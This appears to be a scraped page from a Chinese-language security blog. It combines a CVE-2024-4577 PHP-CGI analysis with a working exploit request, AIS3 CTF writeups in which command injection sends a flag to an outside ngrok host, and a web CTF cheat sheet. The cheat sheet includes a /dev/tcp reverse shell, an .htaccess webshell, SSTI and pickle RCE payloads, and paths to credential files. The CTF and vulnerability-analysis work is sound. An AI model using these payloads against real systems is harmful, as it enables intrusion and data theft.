2024-08-08發表2024-08-28更新CVE6 分鐘讀完 (大約835個字)

漏洞簡介

CVE-2024-4577是一個 PHP CGI 的參數注入漏洞，這個漏洞繞過了 CVE-2012-2311 的保護，透過 windows BEST-Fit 的特性，構造不存在的 urlencode 字元讓 Windows 解析出 - 字元，從而繞過 php cgi 的保護機制。

漏洞分析

要了解這個漏洞，我們需要先坐時光機回到最初的漏洞，也就是CVE-2012-2311更之前的 PHP 5.3.11

CVE-2012-1823

漏洞成因

首先，我們有一個先備知識要知道，那就是 http server 呼叫 CGI 時，會連同 request 的 query 一起當成參數傳給 CGI ，例如：我今天存取了 http://192.168.22.16/php-cgi/php-cgi.exe?foo 時，apache 啟動CGI 的 commandline 其實長這樣：

因此攻擊者只要構造出開頭為 - 的 querystring ， CGI 就會把他當成參數解析，從而導致參數注入漏洞。

漏洞修補

針對 CVE-2012–1823 出現的漏洞，PHP在 5.3.12 將漏洞 patch 掉，方法是檢查 querystring 的開頭是不是 -

-	while ((c = php_getopt(argc, argv, OPTIONS, &php_optarg, &php_optind, 0)) != -1) {
+	if(query_string = getenv("QUERY_STRING")) {
+		decoded_query_string = strdup(query_string);
+		php_url_decode(decoded_query_string, strlen(decoded_query_string));
+		if(*decoded_query_string == '-' && strchr(query_string, '=') == NULL) {
+			skip_getopt = 1;
+		}
+		free(decoded_query_string);
+	}
+	while (!skip_getopt && (c = php_getopt(argc, argv, OPTIONS, &php_optarg, &php_optind, 0)) != -1) {

CVE-2012-2311

漏洞成因

在 5.3.12 發佈後不到一個禮拜就被人 bypass 了，因為只要在-前面塞空格就好(?)

漏洞修補

PHP官方很快就發佈了 5.3.13 版本，這次他們先把前面的空白都變不見(pointer往後移)，再檢查開頭是不是 -

for (p = decoded_query_string; *p &&  *p <= ' '; p++) {
			/* skip all leading spaces */
		}
		if(*p == '-') {
			skip_getopt = 1;
		}

CVE-2024-4577

時隔12年，這個保護機制又被繞掉了，但這次並不影響到全部的php版本，而是只有某些特定語系的 Windows 作業系統，且需要由 CGI 解析才會觸發。

漏洞成因

這個漏洞是因為在 Windows 上有 BEST-Fit 的特性，讓攻擊者在繁體中文等特定語系環境的 Windows 直接生出一個完全不存在的字元(0xad)卻可以被解析成 - ，當然，你也可以透過這份文件，找找看其他語系的 windows 有沒有可以 bypass 的字元。

如何利用

首先，我們可以來看看 PHP CGI 有哪些參數可以下：

❯ php-cgi --help                                                                                                                                                                   ─╯
Usage: php-cgi [-q] [-h] [-s] [-v] [-i] [-f <file>]
       php-cgi <file> [args...]
  -a               Run interactively
  -b <address:port>|<port> Bind Path for external FASTCGI Server mode
  -C               Do not chdir to the script's directory
  -c <path>|<file> Look for php.ini file in this directory
  -n               No php.ini file will be used
  -d foo[=bar]     Define INI entry foo with value 'bar'
  -e               Generate extended information for debugger/profiler
  -f <file>        Parse <file>.  Implies `-q'
  -h               This help
  -i               PHP information
  -l               Syntax check only (lint)
  -m               Show compiled in modules
  -q               Quiet-mode.  Suppress HTTP Header output.
  -s               Display colour syntax highlighted source.
  -v               Version number
  -w               Display source with stripped comments and whitespace.
  -z <file>        Load Zend extension <file>.
  -T <count>       Measure execution time of script repeated <count> times.

應該可以馬上發現， -d 參數非常有用，你可以把所有會妨礙你使用 LFI to RCE 的安全選項全部關掉，然後再用偽協議把髒髒的東西都寫進來

1
2
3

POST http://example.com/?-d%20allow_url_include%3Don%20-d%20auto_prepend%3Dphp%3A%2F%2Finput%2F%0A

<?php phpinfo() ?>

透過php://filter偽協議include惡意程式碼

2024-06-30發表2024-08-28更新CTF / Writeup17 分鐘讀完 (大約2538個字)

2024 AIS3 pre-exam & MFCTF writeup

2024 AIS3 pre-exam writeup

這次幫 AIS3 pre-exam 和 MFCTF 出題，出了兩題：一題 web 和一題 misc (但其實兩題都是web)

evil calculator

This is a calculator written in Python. It’s a simple calculator, but some function in it is VERY EVIL!!
Connection info: http://chals1.ais3.org:5001
Author: TriangleSnake

這是一題很簡單的pyjail(?有jail嗎)，主要問題出在 eval() function，但是有過濾 _ 和 space 。
因為是warmup題，預期解是用open()讀flag，不會用到_和space。

1	{"expression":"open('/flag','r').read()"}

當然，你也可以把 _ 和 space encode 後 rce

1	{"expression":"eval(eval('chr(95)')+eval('chr(95)')+'import'+eval('chr(95)')+eval('chr(95)')+\"('os').popen('').read()\")"}

AIS3{7RiANG13_5NAK3_I5_50_3Vi1}

emoji console

🔺🐍 😡 🅰️ 🆒 1️⃣Ⓜ️🅾️ 🚅☠️✉️ 🥫🫵 🔍🚩⁉️
Connection info: http://chals1.ais3.org:5000
Author: TriangleSnake

這題和資安沒什麼關係，純粹是拼字遊戲，可以隨便按幾個 emoji 後就可以發現他就是把你輸入的 emoji 轉成英文單字後變成一行指令

試幾次會發現一些常用的指令，像是 🐱->cat 、 💿->cd ，還有題目剛進去就提示的 🐍->python 和 ⭐->*

嘗試使用 cat 命令看目錄下面有什麼
1
🐱 ⭐

#!/usr/local/bin/python3

import os
from flask import Flask,send_file,request,redirect,jsonify,render_template
import json
import string
def translate(command:str)->str:
    emoji_table = json.load(open('emoji.json','r',encoding='utf-8'))
    for key in emoji_table:
        if key in command:
            command = command.replace(key,emoji_table[key])
    return command.lower()

app = Flask(__name__)

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/api')
def api():
    command = request.args.get('command')
    
    if len(set(command).intersection(set(string.printable.replace(" ",''))))>0:
        return jsonify({'command':command,'result':'Invalid command'})
    command = translate(command)
    result = os.popen(command+" 2>&1").read()
    return jsonify({'command':command,'result':result})
    

if __name__ == '__main__':
    app.run('0.0.0.0',5000)

{
    "😀": ":D",
    "😁": ":D",
    "😂": ":')",
    "🤣": "XD",
    "😃": ":D",
    "😄": ":D",
    "😅": "':D",
    "😆": "XD",
    "😉": ";)",
    "😊": ":)",
    "😋": ":P",
    "😎": "B)",
    "😍": ":)",
    "😘": ":*",
    "😗": ":*",
    "😙": ":*",
    "😚": ":*",
    "☺️": ":)",
    "🙂": ":)",
    "🤗": ":)",
    "🤩": ":)",
    "🤔": ":?",
    "🤨": ":/",
    "😐": ":|",
    "😑": ":|",
    "😶": ":|",
    "🙄": ":/",
    "😏": ":]",
    "😣": ">:",
    "😥": ":'(",
    "😮": ":o",
    "🤐": ":x",
    "😯": ":o",
    "😪": ":'(",
    "😫": ">:(",
    "😴": "Zzz",
    "😌": ":)",
    "😛": ":P",
    "😜": ";P",
    "😝": "XP",
    "🤤": ":P",
    "😒": ":/",
    "😓": ";/",
    "😔": ":(",
    "😕": ":/",
    "🙃": "(:",
    "🤑": "$)",
    "😲": ":O",
    "☹️": ":(",
    "🙁": ":(",
    "😖": ">:(",
    "😞": ":(",
    "😟": ":(",
    "😤": ">:(",
    "😢": ":'(",
    "😭": ":'(",
    "😦": ":(",
    "😧": ">:(",
    "😨": ":O",
    "😩": ">:(",
    "🤯": ":O",
    "😬": ":E",
    "😰": ":(",
    "😱": ":O",
    "🥵": ">:(",
    "🥶": ":(",
    "😳": ":$",
    "🤪": ":P",
    "😵": "X(",
    "🥴": ":P",
    "😠": ">:(",
    "😡": ">:(",
    "🤬": "#$%&!",
    "🤕": ":(",
    "🤢": "X(",
    "🤮": ":P",
    "🤧": ":'(",
    "😇": "O:)",
    "🥳": ":D",
    "🥺": ":'(",
    "🤡": ":o)",
    "🤠": "Y)",
    "🤥": ":L",
    "🤫": ":x",
    "🤭": ":x",
    "🐶": "dog",
    "🐱": "cat",
    "🐭": "mouse",
    "🐹": "hamster",
    "🐰": "rabbit",
    "🦊": "fox",
    "🐻": "bear",
    "🐼": "panda",
    "🐨": "koala",
    "🐯": "tiger",
    "🦁": "lion",
    "🐮": "cow",
    "🐷": "pig",
    "🐽": "pig nose",
    "🐸": "frog",
    "🐒": "monkey",
    "🐔": "chicken",
    "🐧": "penguin",
    "🐦": "bird",
    "🐤": "baby chick",
    "🐣": "hatching chick",
    "🐥": "front-facing baby chick",
    "🦆": "duck",
    "🦅": "eagle",
    "🦉": "owl",
    "🦇": "bat",
    "🐺": "wolf",
    "🐗": "boar",
    "🐴": "horse",
    "🦄": "unicorn",
    "🐝": "bee",
    "🐛": "bug",
    "🦋": "butterfly",
    "🐌": "snail",
    "🐞": "lady beetle",
    "🐜": "ant",
    "🦟": "mosquito",
    "🦗": "cricket",
    "🕷️": "spider",
    "🕸️": "spider web",
    "🦂": "scorpion",
    "🐢": "turtle",
    "🐍": "python",
    "🦎": "lizard",
    "🦖": "T-Rex",
    "🦕": "sauropod",
    "🐙": "octopus",
    "🦑": "squid",
    "🦐": "shrimp",
    "🦞": "lobster",
    "🦀": "crab",
    "🐡": "blowfish",
    "🐠": "tropical fish",
    "🐟": "fish",
    "🐬": "dolphin",
    "🐳": "whale",
    "🐋": "whale",
    "🦈": "shark",
    "🐊": "crocodile",
    "🐅": "tiger",
    "🐆": "leopard",
    "🦓": "zebra",
    "🦍": "gorilla",
    "🦧": "orangutan",
    "🦣": "mammoth",
    "🐘": "elephant",
    "🦛": "hippopotamus",
    "🦏": "rhinoceros",
    "🐪": "camel",
    "🐫": "two-hump camel",
    "🦒": "giraffe",
    "🦘": "kangaroo",
    "🦬": "bison",
    "🦥": "sloth",
    "🦦": "otter",
    "🦨": "skunk",
    "🦡": "badger",
    "🐾": "paw prints",
    "◼️": "black square",
    "◻️": "white square",
    "◾": "black medium square",
    "◽": "white medium square",
    "▪️": "black small square",
    "▫️": "white small square",
    "🔶": "large orange diamond",
    "🔷": "large blue diamond",
    "🔸": "small orange diamond",
    "🔹": "small blue diamond",
    "🔺": "triangle",
    "🔻": "triangle",
    "🔼": "triangle",
    "🔽": "triangle",
    "🔘": "circle",
    "⚪": "circle",
    "⚫": "black circle",
    "🟠": "orange circle",
    "🟢": "green circle",
    "🔵": "blue circle",
    "🟣": "purple circle",
    "🟡": "yellow circle",
    "🟤": "brown circle",
    "⭕": "empty circle",
    "🅰️": "A",
    "🅱️": "B",
    "🅾️": "O",
    "ℹ️": "i",
    "🅿️": "P",
    "Ⓜ️": "M",
    "🆎": "AB",
    "🆑": "CL",
    "🆒": "COOL",
    "🆓": "FREE",
    "🆔": "ID",
    "🆕": "NEW",
    "🆖": "NG",
    "🆗": "OK",
    "🆘": "SOS",
    "🆙": "UP",
    "🆚": "VS",
    "㊗️": "祝",
    "㊙️": "秘",
    "🈺": "營",
    "🈯": "指",
    "🉐": "得",
    "🈹": "割",
    "🈚": "無",
    "🈲": "禁",
    "🈸": "申",
    "🈴": "合",
    "🈳": "空",
    "🈵": "滿",
    "🈶": "有",
    "🈷️": "月",
    "🚗": "car",
    "🚕": "taxi",
    "🚙": "SUV",
    "🚌": "bus",
    "🚎": "trolleybus",
    "🏎️": "race car",
    "🚓": "police car",
    "🚑": "ambulance",
    "🚒": "fire engine",
    "🚐": "minibus",
    "🚚": "delivery truck",
    "🚛": "articulated lorry",
    "🚜": "tractor",
    "🛴": "kick scooter",
    "🚲": "bicycle",
    "🛵": "scooter",
    "🏍️": "motorcycle",
    "✈️": "airplane",
    "🚀": "rocket",
    "🛸": "UFO",
    "🚁": "helicopter",
    "🛶": "canoe",
    "⛵": "sailboat",
    "🚤": "speedboat",
    "🛳️": "passenger ship",
    "⛴️": "ferry",
    "🛥️": "motor boat",
    "🚢": "ship",
    "👨": "man",
    "👩": "woman",
    "👶": "baby",
    "🧓": "old man",
    "👵": "old woman",
    "💿": "CD",
    "📀": "DVD",
    "📱": "phone",
    "💻": "laptop",
    "🖥️": "pc",
    "🖨️": "printer",
    "⌨️": "keyboard",
    "🖱️": "mouse",
    "🖲️": "trackball",
    "🕹️": "joystick",
    "🗜️": "clamp",
    "💾": "floppy disk",
    "💽": "minidisc",
    "☎️": "telephone",
    "📟": "pager",
    "📺": "television",
    "📻": "radio",
    "🎙️": "studio microphone",
    "🎚️": "level slider",
    "🎛️": "control knobs",
    "⏰": "alarm clock",
    "🕰️": "mantelpiece clock",
    "⌚": "watch",
    "📡": "satellite antenna",
    "🔋": "battery",
    "🔌": "plug",
    "🚩": "flag",
    "⓿": "0",
    "❶": "1",
    "❷": "2",
    "❸": "3",
    "❹": "4",
    "❺": "5",
    "❻": "6",
    "❼": "7",
    "❽": "8",
    "❾": "9",
    "❿": "10",
    "⭐": "*",
    "➕": "+",
    "➖": "-",
    "✖️": "×",
    "➗": "÷"

}cat: flag: Is a directory
cat: templates: Is a directory

現在我們得到一個json有所有指令的對照表，並且可以知道flag應該是在 flag 的資料夾。

嘗試 cat flag 資料夾裡面的東西，可以從剛剛 dump 出來的 json 找可以用的指令，這邊使用;/和:|切割指令，回傳的結果似乎是一個 python file

1	💿 🚩😓😑🐱 ⭐ #cd flag;/:\|

1
2
3

#flag-printer.py

print(open('/flag','r').read())

執行python，get flag

1	💿 🚩😓😑🐍❸ 🚩➖🖨️⭐

AIS3{🫵🪡🉐🤙🤙🤙👉👉🚩👈👈}

Can you describe Pyjail?

Yet another 🐍 ⛓️.
nc chals1.ais3.org 48763
Author: Vincent55

這題不是我出的，但是 Vincent 大佬出的題目還是要捧場一下

source code

看source code可以知道是很純的pyjail，在 safe_eval 裡面就把該 ban 的都 ban 光了

~~跟前面那題 evil calculator 比起來 calculator 一點都不 evil~~

#!/usr/local/bin/python3

from safe_eval import safe_eval
from inspect import getdoc


class Desc:
    """
    Welcome to my 🐍 ⛓️
    """

    def __get__(self, objname, obj):
        return __import__("conf").flag

    def desc_helper(self, name):
        origin = getattr(type, name)
        if origin == type.__getattribute__:
            raise NameError(
                "Access to forbidden name %r (%r)" % (name, "__getattribute__")
            )
        self.helper = origin


class Test:
    desc = Desc()


test = Test()
test.desc = "flag{fakeflag}"


# Just a tricky way to print a welcome message, or maybe a hint :/
# You can just `print(getdoc(Desc))`
# This is not part of the challenge, but if you can get the flag through here, please contact @Vincent55.
welcome_msg = """
desctmp := Desc()
desctmp.desc_helper("__base__")
Obj := desctmp.helper
desctmp := Desc()
desctmp.desc_helper("__subclasses__")
print(getdoc(desctmp.helper(Obj)[-2]))
""".strip().replace("\n", ",")
welcome_msg = f"({welcome_msg})"

safe_eval(
    welcome_msg,
    {"__builtins__": {}},
    {"Desc": Desc, "print": print, "getdoc": getdoc},
)


# Your challenge begin here!
payload = input("✏️: ")

safe_eval(
    payload,
    {"__builtins__": {}},
    {"Desc": Desc},
)

# print(f"test.__dict__: {test.__dict__}")
print(f"🚩: {test.desc}")

看完 source code 可以發現他在print welcome_msg 的時候用了一個非常詭異的方法，也算是這題的題示。

welcome_msg到底在幹嘛

首先看到下面這段程式碼：

welcome_msg = """
desctmp := Desc()
desctmp.desc_helper("__base__")
Obj := desctmp.helper
desctmp := Desc()
desctmp.desc_helper("__subclasses__")
print(getdoc(desctmp.helper(Obj)[-2]))
""".strip().replace("\n", ",")
welcome_msg = f"({welcome_msg})"

safe_eval(
    welcome_msg,
    {"__builtins__": {}},
    {"Desc": Desc, "print": print, "getdoc": getdoc},
)

其實會發現你可以透過 getattr(type, name) 取得type底下的attribute
這裡會卡一個知識點，就是當你要取得某個 class 的 subclass 的時候(假設是 str )，會寫 str.__subclasses__() ，但其實可以寫成 type.__subclasses__(str) ，前提是 str 的 class 必須是 type

所以我們可以先透過 getattr(type,"__subclasses__") 取得 type.__subclasses__ 再把 __base__ 塞進去就可以得到 type.__base__.__subclasses__()

好到這邊大家應該已經搞懂上面那陀 welcome_msg 的 payload 到底在幹嘛了，簡單來說就是到 object 裡面把所有 class 抓出來，然後抓倒數第2個 class (jail.Desc)把它印出來

解題

一開始想改抓 jail.Test 下面的 desc 就可以拿到 flag 了
抓是抓得到，但是print不出來啊

1	a = Desc();a.desc_helper("__base__");obj=a.helper;a = Desc();a.desc_helper("__subclasses__");obj = a.helper(obj)[-1].desc

這邊又卡一個知識點了，那就是 python 的 descriptor 解析有優先度的問題(題目有提示describe，雖然我覺得沒有人看得懂)

以下參考 @Vincent550102 的筆記：

如果 __get__ 與 __set__ 都有，優先使用描述器（Descriptor）：
當一個描述器同時實現了 __get__ 和 __set__ 方法時，Python 會認為它是一個資料描述器（Data Descriptor）。資料描述器的一個特點是它們對屬性的訪問有更高的優先級。
如果不是，則在自己的 __dict__ 裡面找：

如果描述器沒有作為資料描述器或者只實現了 __get__ 方法的非資料描述器（Non-Data Descriptor）或者找不到描述器，Python 會繼續在物件的 __dict__ 屬性字典中尋找是否存在該屬性。

若在 __dict__ 也找不到，嘗試用描述器的 __get__：
如果在物件的 dict 中找不到該屬性，Python 會檢查是否存在只實現了 get 方法的非資料描述器，如果存在，則回傳該描述器的 __get__ 方法。
都沒有，直接回傳描述器：

如果上述步驟都無法找到該屬性，最後會返回描述器物件本身，如果連描述器也不存在，則會拋出 AttributeError。

看到這邊，問題已經變很簡單了，那就是我們需要將 __get__ 變成最高優先級，此時後面就算 fake_flag 把 test.desc 蓋掉也沒有用，仍然會回傳 Test.__get__() 的內容

如何將 __get__ 變成最高優先級呢？只要新增一個 __set__ 就行了

1 2	func = lambda self,obj,val:None desc.__setattr__("__set__",func)

1
2

#payload
(a := Desc(),a.desc_helper("__base__"),obj:=a.helper,a := Desc(),a.desc_helper("__subclasses__"),desc:=a.helper(obj)[-2],a:=Desc(),a.desc_helper("__setattr__"),func:=lambda self,obj,val:None,a.helper(desc,"__set__",func))

AIS3{y0u_kn0w_h0w_d35cr1p70r_w0rk!}

2024-04-30發表2024-09-04更新CTF / Cheatsheet14 分鐘讀完 (大約2126個字)

CTF Cheatsheet - Web

web

Information Leak

.git / .svn / .bzr

版本控制系統

.git洩漏可用scrabble將整個.git資料夾下載下來並用git 還原

1	./scrabble http://www.example.com/

Google Hacking

1
2
3

site:www.example.com
intext:"管理介面"
filetype:sql

GHDB

robots.txt

.DS_Store

.index.php.swp

Backup file

XSS

XSS Payload

CSP 怎麼偷資料

假設他 Content Security Policy 在亂寫一通的話，可以用 CSP Evaluator 檢查

CSP 沒擋用什麼偷

例如 CSP 只有擋 script ，那就用 <img> 來偷

1	script-src 'none';

如果把連線都擋掉的話，還是可以使用 location.href 或 window.open() 透過跳轉來偷資料

1	default-src 'none';script-src 'unsafe-inline';

JSONP

允許特定第三方網站引入時，可以嘗試使用 JSONP 引入惡意程式碼

1	default-src https://example.com

JSONBee

DNS prefetch

1	<link rel=dns-prefetch href=[YOUR_DATA].webhook.trianglesnake.com>

WebRTC

var pc = new RTCPeerConnection({
  "iceServers":[
      {"urls":[
        "turn:74.125.140.127:19305?transport=udp"
       ],"username":"_all_your_data_belongs_to_us",
      "credential":"."
    }]
});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);

PHP 弱型別判斷

PHP弱型別的安全問題詳細總結

md5()&sha1()

md5(array()) ==sha1(array())//true=>error=error

md5(240610708)==0 //true
/*
md5(240610708)=>'0e462097431906509019562988736854'
在弱型別判斷中會做為科學記號和int比較
*/
sha1('aa3OFF9m')=>'0e36977786278517984959260394024281014729'

https://www.cnblogs.com/shijiahao/p/12638484.html

https://www.twblogs.net/a/5cd66c22bd9eee67a77f66f9

可偽造ip相關

X-Forward-For
Client-IP
X-Real-IP

SSRF

gopher 用法

gopher://host:port/_HTTPRequest

//example POST request:

*gopher://192.168.0.1:8888/_POST/index.php?action=login HTTP/1.1
Host:127.0.0.1:1000
Content-type:application/x-www-form-urlencoded
Content-Length:20

username=admin&password=bupt666
//換行要用%0D%0A(\r\n)*

備註：發起POST的四個必要欄位
POST /ssrf/base/post.php HTTP/1.1
host:192.168.0.109
Content-Type:application/x-www-form-urlencoded
Content-Length:11

gopher POST request payload

1	gopher://localhost:80/_POST%20/flag.php%20HTTP/1.1%0d%0AHost:%20localhost%0d%0AContent-Type:%20application/x-www-form-urlencoded%0d%0AContent-Length:%207%0d%0A%0d%0afoo=bar%0d%0A

https://hackmd.io/@Lhaihai/H1B8PJ9hX

LFI&RFI

php require()&include()

偽協議

//phpfilter
index.php?file=php://filter/read=convert.base64-encode/resource=target.php

//phar 打包成zip下載
index.php?file=phar://test.zip/target.php

//data:URL schema
index.php?file=data:text/plain,<?php system('ls');?>
index.php?file=data:text/plain;base64,**PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==**

data:URL schema更多用法

#敏感檔案
/etc/passwd // 账户信息

/etc/shadow // 账户密码文件

/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件

/usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置

/usr/local/app/php5/lib/php.ini // PHP相关配置

/etc/httpd/conf/httpd.conf // Apache配置文件

/etc/my.conf // mysql 配置文件

SESSION植入WebShell

若session可寫入，可以利用LFI執行php

1 2	寫入<?php system("ls");?> index.php?file=/<sess_path>/sess_<your session>

session_path可由phpinfo內找到session.save_path，若無則放在/tmp內

/var/lib/php/session

session檔名為sess_<session id>

freebuf-LFI

JS prototype pollution

基於 JS 原型鏈的攻擊手法：Prototype Pollution

當javascript在呼叫內建函式時，會透過prototype找上一層要呼叫的函式(因為內建函式並沒有真正在乎叫的物件之中)
舉例來說:

1 2	var lst = ['test'] console.log(lst.toString())

toString()不可能每個宣告的Array Object都有toString()，當呼叫時必須透過prototype找到上一層然後呼叫Array.toString

所以其實在呼叫lst.toString()的時候其實是呼叫了Array.prototype.toString()

而哪些object的prototype是甚麼則定義在object的__proto__裡面

1	lst.__proto__.toString == Array.prototype.toString //true

因此，在一些情況下，有些功能可能造成prototype可以被竄改，進而導致prototype pollution

parse query

在對於Array進行賦值的時候，攻擊者可以透過構造key為__proto__達到prototype pollution

//parseQuery function回傳一個parsed的dict
function parseQuery(queryString) {
  const params = {};
  queryString.split('&').forEach(param => {
    const [key, value] = param.split('=');
    params[key] = value;
  });
  return params;
}

// Example usage
const userInput = 'user=admin&isAdmin=true';

// Parsing user input
const parsedQuery = parseQuery(userInput);
console.log(parsedQuery);  // Output: { user: 'admin', isAdmin: 'true' }

// 透過prototype pollution把驗證機制竄改掉，繞過檢查機制
parseQuery('user=admin&isAdmin=true&__proto__.isAdmin=true');

// isAdmin被竄改，return true
console.log({}.isAdmin);  // Output: true

合併物件

合併物件同樣有可能發生

function merge(a, b) {
  for(let prop in b) {
    if (typeof a[prop] === 'object') {
      merge(a[prop], b[prop])
    } else {
      a[prop] = b[prop]
    }
  } 
}

var config = {
  a: 1,
  b: {
    c: 2
  }
}

var customConfig = JSON.parse('{"__proto__": {"isAdmin": 1}}')
merge(config, customConfig)

var obj = {}
console.log(obj.isAdmin)

不難看出，其實只要有對Object的key和value進行操作，就很有可能導致prototype pollution

.htaccess

可影響apache伺服器中資料夾內的檔案

利用指定404、403等錯誤響應文件達成LFI

1 2	ErrorDocument 404 /flag.txt ErrorDocument 404 /shell.php

強制解析非php檔案造成RCE

1	AddType application/x-httpd-php .txt

將.htaccess本身作為php執行後門

1 2	php_value auto_prepend_file .htaccess #<?php echo system($_GET['cmd']); ?>

#為.htaccess的註解符號

若有WAF則可用\換行繞過

1
2
3

p\
hp_value auto_prepend_file .htaccess
#<?=echo system($_GET['cmd']); ?>

遇到\時，會接續下一行

https://blog.csdn.net/solitudi/article/details/116666720

Serialize&Deserialize

呼叫反序列化時，可能呼叫一些Magic Method

序列化

Value	Serialize(PHP)
8459302	i:8459302;
TRUE	b:1;
NULL	N;
[’x’,1]	a:2:{i:0;s:1:”x”;i:1;i:1;}

PHP Object的序列化

new Cat("kitten") =>O:3:"Cat":1:{s:4:"name";s:6:"kitten";}

class Cat{
	public $a;  =>{s:1:"a";.....}
	private $b; =>{s:6:"\x00Cat\x00b";.....}
	protected $c; =>{s:4:"\x00*\x00c";.....}
}

反序列化

PHP Magic Method
在指定時機自動呼叫magic method
__destruct() //Object 被銷毀或garbage collection
__wakeup() //unserialize時觸發
__call() //被呼叫不存在方法時觸發
__toString() //被當成string處理時觸發(如 echo)

**Python Pickle**
pickle.dumps()會將資料序列化
可寫payloads
import subprocess
class payload(object):
    def __reduce__(self):
        return (subprocess.check_output,(['cat','/flag_5fb2acebf1d0c558'],))
再想辦法把payload()塞進dumps裡面

Phar與反序列化

SSTI(Server Side Template Injection)

python Flask預設模板為Jinja2

render_template_string(template)
#可做一些簡單運算
template={{7*7}} =>49

{%for item in item_list %}
	{{ item }}{% if not loop.last %},{% endif %}
{%-endfor-%}
'''
可以import os os.system()嗎? 不行，code是放在sandbox中跑的
但可以用config.from_pyfile(filename)執行任意python檔案
'''

使用_mro_(Method Resolution Order) bypass Python的Sandbox

[].__class__ =><class 'list'>
#對object 查詢method

[].__class__.__mro__ =>(<class 'list'>,<class 'object>)
#_mro_可查詢解析物件順序，此時可以發現所有物件的底層皆為object

[].__class__.__base__ =><class 'object'>
#_base_可返回最底層的method,所以返回object

[].__class_.__base_.__subclasses__()
#_subclasses_直接返回所有subclasses，猛了object在最底層，所以所有物件都會return

[].__class__.__base__.__subclasses__()[132] =><class 'os._wrap_close'>
#os出現了

[].__class__.__base__.__subclasses__()[132].__init__.__globals__ =>返回所有可被global調用的method

{{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['system']('ls')}}
#os.system被A出來了

{{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls').read()}}
#回傳結果

SSTI Payload
更多奇技淫巧:https://tw511.com/a/01/48066.html

SQL injection

https://www.796t.com/content/1545706659.html
https://zu1k.com/posts/security/web-security/bypass-tech-for-sql-injection-keyword-filtering/

Comments

MySQL
#comment
-- comment     [Note the space after the double dash]
/*comment*/
/*! MYSQL Special SQL */

PostgreSQL
--comment
/*comment*/

MSQL
--comment
/*comment*/

Oracle
--comment

SQLite
--comment
/*comment*/

HQL
HQL does not support Comments

常見waf

1	escape()->被轉成%XX，@* _ + - . /不編碼

waf繞過

1
2
3


'弄不出來的時候可以嘗試兩個urlencode合在一起
%bf%27、%df%27、%aa%27

Reversed Shell

1
2
3

最經典
nc -klvp [port] #attacker's host
/bin/sh -i >& /dev/tcp/[host]/[port] 0<&1 #victim

問就是 revshells.com

Commandline Injection

截斷指令

最基本的截斷可用;達成，也可使用

cmd1&&cmd2當cmd1 執行成功時執行cmd2
cmd1&cmd2簡單拼接，無論cmd1執行成功與否都會執行cmd2
cmd1||cmd2當cmd1執行失敗時執行`cmd2
cmd1|cmd2將cmd1的執行結果以pipeline塞給cmd2
可以將指令包在 \`或是$()` 之中

空格繞過

使用<>繞過
- cat<flag
- cat<>flag
{cat,flag}
使用特殊變量$IFS繞過(預設是空格)
- cat$IFS./flag
- cat$IFS\flag

過濾繞過

regex繞過
- /usr/bin/ca? flag
反斜線繞過
- ca\t fl\ag
空變量繞過
- ca${Z}t flag

一些猛料

https://www.zhihu.com/tardis/zm/art/339266206?source_id=1003
https://blog.csdn.net/m0_61011147/article/details/126722464

一些會一直旺季的東東

web

nslookup final

有command injection，用``把指令包起來，但是會有一個問題就是他不會回傳結果，

1	curl webhook.trianglesnake.com/?text=123

呼叫聊天機器人webhook試試看，有收到訊息，所以直接把flag偷出來

因為有WAF限制flag、*，但我知道flag的prefix了，所以直接遍歷根目錄檔案找出flag

1 2	`curl -G https://eec1-182-234-154-17.ngrok-free.app/ --data-urlencode "$(find / -maxdepth 1 -type f -exec grep 'ais3' {} +)"`

AIS3{jUST_3a$y_cOMmaND_INj3c7I0N}

internal

沒辦法碰到/flag但是如果由內網機器送redirect請求並包含X-Accel-Redirectheader就可以穿透。

這題在考crlf截斷，截斷之後可以header injection

1	http://10.105.0.21:11580/?redir=https://www.google.com%0d%0aX-Accel-Redirect:%20/flag

AIS3{JUsT_s0m3_FUnNy_N91NX_FEaturE}

copypasta

題目有sql injection，用sqlmap dump出所有column後可以直接存取/posts/flag_id，但他會檢查cookie，所以絲路變成：透過sql injection創建不存在的貼文->透過string format撈出app.secret_key->偽造cookie->存取flag頁面

透過sql injection創造貼文

#source code
tmpl = db().cursor().execute(
        f"SELECT * FROM copypasta_template WHERE id = {id}"
    ).fetchone()

這裡很明顯留了一個洞給我們

1 2	#payload ?id=1,'a','{field.__class__....}'

此時下面進行format string的時候就會被injection

1	res = content.format(field=request.form)

這題沒有做出來，卡在Pyton format string漏洞，可以摸到magic method，但是因為在不同namespace沒辦法用__global__撈到app.secret_key

reverse

stateful

把整個流程反過來做一次真reversed engineering
先用ghidra把C弄出來後用vs code 的取代把每個function改成printf，之後用python把出來的function整個反過來

string = """
3618225054(k_target)
2057902921(k_target)
671274660(k_target)
...
...
557589375(k_target)
3420754995(k_target)
3648003850(k_target)
1978986903(k_target)
"""

lst = string.split('\n')
lst.reverse()
print(lst)
for i in lst:
    print('state_'+i+';')

把每個狀態機的function+改成-，然後把k_target逆向回推

// Hello world! Cplayground is an online sandbox that makes it easy to try out
// code.

#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>



int main() {
  int local_14 = 1;
  int local_10 = 0;
  unsigned local_c = 0xd7a9bb9e;
  bool bVar1 = false;
  char k_target[43] =
{
  38,
  75,
  ...
  128,
  101,
  -20,
  125
};
  
state_1978986903(k_target);
state_3648003850(k_target);
state_3420754995(k_target);
state_557589375(k_target);
...
state_2057902921(k_target);
state_3618225054(k_target);
  for (int i=0;i<44;i++){
      printf("%c",k_target[i]);
  }
  return 0;
}

基本上就是反著做一遍

AIS3{Ar3_y0U_@_sTAtEfuL_Or_S7AT3L3SS_ctfer}

漏洞簡介

漏洞分析

CVE-2012-1823

漏洞成因

漏洞修補

CVE-2012-2311

漏洞成因

漏洞修補

CVE-2024-4577

漏洞成因

如何利用

2024 AIS3 pre-exam writeup

evil calculator

emoji console

Can you describe Pyjail?

source code

welcome_msg到底在幹嘛

解題

web

Information Leak

.git / .svn / .bzr

Google Hacking

XSS

CSP 怎麼偷資料

JSONP

DNS prefetch

WebRTC

PHP 弱型別判斷

md5()&sha1()

header竄改

可偽造ip相關

SSRF

gopher 用法

LFI&RFI

php require()&include()

偽協議

SESSION植入WebShell

JS prototype pollution

parse query

